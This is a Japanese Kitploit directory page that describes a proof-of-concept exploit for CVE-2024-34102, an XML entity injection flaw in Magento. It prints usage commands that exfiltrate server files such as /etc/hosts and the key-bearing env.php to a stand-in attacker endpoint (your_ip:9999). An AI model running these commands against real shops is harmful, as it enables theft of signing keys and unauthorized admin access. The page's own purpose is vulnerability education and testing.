Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-34102 — Magentoにおける重大なXMLエンティティインジェクション脆弱性のPoCデモ | Kitploit
ツール/GitHubGitHub/d0rb/cve-2024-34102
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubd0rb/cve-2024-34102

CVE-2024-34102

Magentoにおける重大なXMLエンティティインジェクション脆弱性のPoCデモ

リポジトリを見る
22年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

私たちは、テロ組織ハマスによって人質に取られたすべての市民の安全な帰還を求めます。すべての人質が解放され、無事に帰宅するまで私たちは休みません。あなたも彼らを家に連れ戻す手助けができます。 https://stories.bringthemhomenow.net/

CVE-2024-34102 PoC 🚀

このリポジトリには、Magento の重大な XML エンティティインジェクションの脆弱性(CVE-2024-34102)に対する概念実証(PoC)エクスプロイトが含まれています。この脆弱性により、機密ファイルの外部への流出が可能となり、その結果、Magento の管理機能への不正アクセスに悪用される可能性があります。このエクスプロイトは教育目的であり、責任を持って使用する必要があります。

概要 📖

Magento は世界的に最も人気のある eコマースソリューションの一つです。2024年6月に、CVE-2024-34102 として識別される、認証前の重大な XML エンティティインジェクションの問題が発見されました。この脆弱性は、Magento の app/etc/env.php ファイルの流出など、深刻な結果を引き起こす可能性があります。このファイルには JWT の署名に使用される暗号鍵が含まれています。

機能 🌟

  • 脆弱な Magento インスタンスから機密ファイルを外部に流出させます。
  • シンプルで直接的な使い方。
  • XML エンティティインジェクションの教育的デモンストレーション。

使用方法 🚀

前提条件

  • Python 3.x
  • requests ライブラリ(pip install requests)

エクスプロイトの実行

  1. リポジトリをクローンします:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. 必要な引数を指定してスクリプトを実行します:

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

コマンドライン引数

  • --target-url: ターゲットの Magento インスタンスの URL。
  • --target-file: ターゲットサーバー上で外部に流出させるファイルパス。
  • --exfil-url: 流出データを受信する URL。

例 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
ツールをダウンロード